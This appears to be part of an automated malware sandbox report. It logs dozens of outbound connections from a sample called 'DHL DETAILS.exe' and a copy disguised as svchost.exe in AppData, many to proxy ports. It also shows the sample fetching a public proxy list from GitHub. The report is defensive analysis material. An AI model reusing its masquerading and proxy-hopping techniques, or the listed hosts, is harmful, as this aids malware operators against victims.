7907	192.168.2.5	51302	212.110.188.202	34409	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7908	192.168.2.5	56080	139.198.120.15	29527	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7909	192.168.2.5	53055	51.89.173.40	60775	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7910	192.168.2.5	56031	181.209.78.75	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7911	192.168.2.5	56478	195.248.243.149	7237	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7912	192.168.2.5	51355	103.48.69.113	82	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7913	192.168.2.5	61458	45.11.95.165	5019	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7914	192.168.2.5	65315	94.131.106.196	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7915	192.168.2.5	58308	72.195.34.35	27360	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7916	192.168.2.5	56651	72.217.216.239	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7917	192.168.2.5	61829	8.219.97.248	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7918	192.168.2.5	58639	185.103.101.39	10051	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7919	192.168.2.5	49271	103.109.59.209	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7920	192.168.2.5	63837	132.148.245.112	38117	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7921	192.168.2.5	59981	187.60.219.4	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7922	192.168.2.5	64614	103.146.137.5	1081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7923	192.168.2.5	57977	16.162.211.90	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7924	192.168.2.5	63027	84.47.145.189	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7925	192.168.2.5	61226	78.30.128.10	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7926	192.168.2.5	61285	198.12.255.193	51612	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7927	192.168.2.5	50033	210.4.194.196	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7928	192.168.2.5	63217	91.134.140.160	30895	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7929	192.168.2.5	62056	117.4.242.216	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7930	192.168.2.5	62562	41.223.234.116	37259	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7931	192.168.2.5	62858	45.11.95.165	6014	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7932	192.168.2.5	65106	104.250.117.48	7070	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7933	192.168.2.5	55534	103.48.69.113	82	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7934	192.168.2.5	61188	67.205.177.122	40448	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7935	192.168.2.5	58768	82.65.240.111	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7936	192.168.2.5	55418	3.73.120.104	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7937	192.168.2.5	56479	193.151.130.114	8086	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7938	192.168.2.5	51609	51.75.125.208	48114	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7939	192.168.2.5	50377	91.148.127.162	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7940	192.168.2.5	56045	202.6.224.51	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7941	192.168.2.5	55803	78.30.128.10	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7942	192.168.2.5	56484	78.30.128.10	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7943	192.168.2.5	61129	162.214.225.223	49806	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7944	192.168.2.5	61348	13.81.217.201	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7945	192.168.2.5	61280	166.62.38.100	54083	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7946	192.168.2.5	61261	91.134.140.160	56495	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7947	192.168.2.5	61173	5.189.163.210	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7948	192.168.2.5	61043	117.30.118.200	8118	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7949	192.168.2.5	61203	181.143.11.157	10219	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7950	192.168.2.5	61401	190.5.77.211	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7951	192.168.2.5	51273	139.224.64.191	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7952	192.168.2.5	55821	45.173.12.141	1994	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7953	192.168.2.5	64795	103.109.59.209	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7954	192.168.2.5	55789	171.244.140.160	53749	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7955	192.168.2.5	64954	83.221.222.240	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7956	192.168.2.5	56482	91.148.127.162	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7957	192.168.2.5	56534	162.214.227.68	55392	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7958	192.168.2.5	56531	78.30.128.10	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7959	192.168.2.5	56563	51.79.87.144	41746	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7960	192.168.2.5	56588	107.175.37.178	43029	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7961	192.168.2.5	56716	65.49.38.202	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7962	192.168.2.5	56722	51.89.173.40	17982	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7963	192.168.2.5	56819	51.89.173.40	23313	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7964	192.168.2.5	56577	140.238.25.255	21000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7965	192.168.2.5	56575	221.224.44.91	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7966	192.168.2.5	56790	45.173.12.141	1994	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7967	192.168.2.5	56702	161.97.173.78	49145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7968	192.168.2.5	56644	210.4.194.196	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7969	192.168.2.5	56733	45.11.95.165	5018	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7970	192.168.2.5	56776	128.199.221.91	33383	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7971	192.168.2.5	56824	139.224.64.191	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7972	192.168.2.5	56845	51.79.87.144	41746	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7973	192.168.2.5	56855	51.79.87.144	41746	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7974	192.168.2.5	56619	45.81.232.17	47056	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7975	192.168.2.5	56621	194.145.209.187	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7976	192.168.2.5	56713	153.19.91.77	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7977	192.168.2.5	56752	37.187.91.192	11721	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7978	192.168.2.5	58622	47.91.65.23	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7979	192.168.2.5	56570	162.241.46.6	64353	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7980	192.168.2.5	56648	92.204.135.37	62969	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7981	192.168.2.5	56571	181.78.11.218	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7982	192.168.2.5	56706	94.23.252.168	9180	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7983	192.168.2.5	56785	161.35.83.251	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7984	192.168.2.5	56827	91.148.127.162	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7985	192.168.2.5	56869	37.187.73.7	16113	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7986	192.168.2.5	56860	132.148.245.247	60349	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7987	192.168.2.5	56627	12.186.205.122	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7988	192.168.2.5	56833	51.91.109.83	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7989	192.168.2.5	56791	51.15.133.214	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7990	192.168.2.5	56685	202.61.204.51	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7991	192.168.2.5	56711	37.187.73.7	10362	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7992	192.168.2.5	56843	42.193.58.96	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7993	192.168.2.5	56844	103.48.69.113	82	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	140.82.114.3	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:10 UTC	101	OUT	GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1 Host: github.com Connection: Keep-Alive
2024-03-09 12:14:10 UTC	506	IN	HTTP/1.1 200 OK Server: GitHub.com Date: Sat, 09 Mar 2024 12:14:10 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With ETag: W/"8f9786a31fe2b7e37921fa8c44233cd3" Cache-Control: max-age=0, private, must-revalidate Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-03-09 12:14:10 UTC	3592	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
2024-03-09 12:14:10 UTC	21	IN	Data Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: connection: close
2024-03-09 12:14:10 UTC	1370	IN	Data Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
2024-03-09 12:14:10 UTC	1370	IN	Data Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
2024-03-09 12:14:10 UTC	1370	IN	Data Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
2024-03-09 12:14:10 UTC	1370	IN	Data Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
2024-03-09 12:14:10 UTC	1370	IN	Data Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
2024-03-09 12:14:10 UTC	1370	IN	Data Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 33 38 66 62 37 63 34 37 65 37 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-338fb7c47e7c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
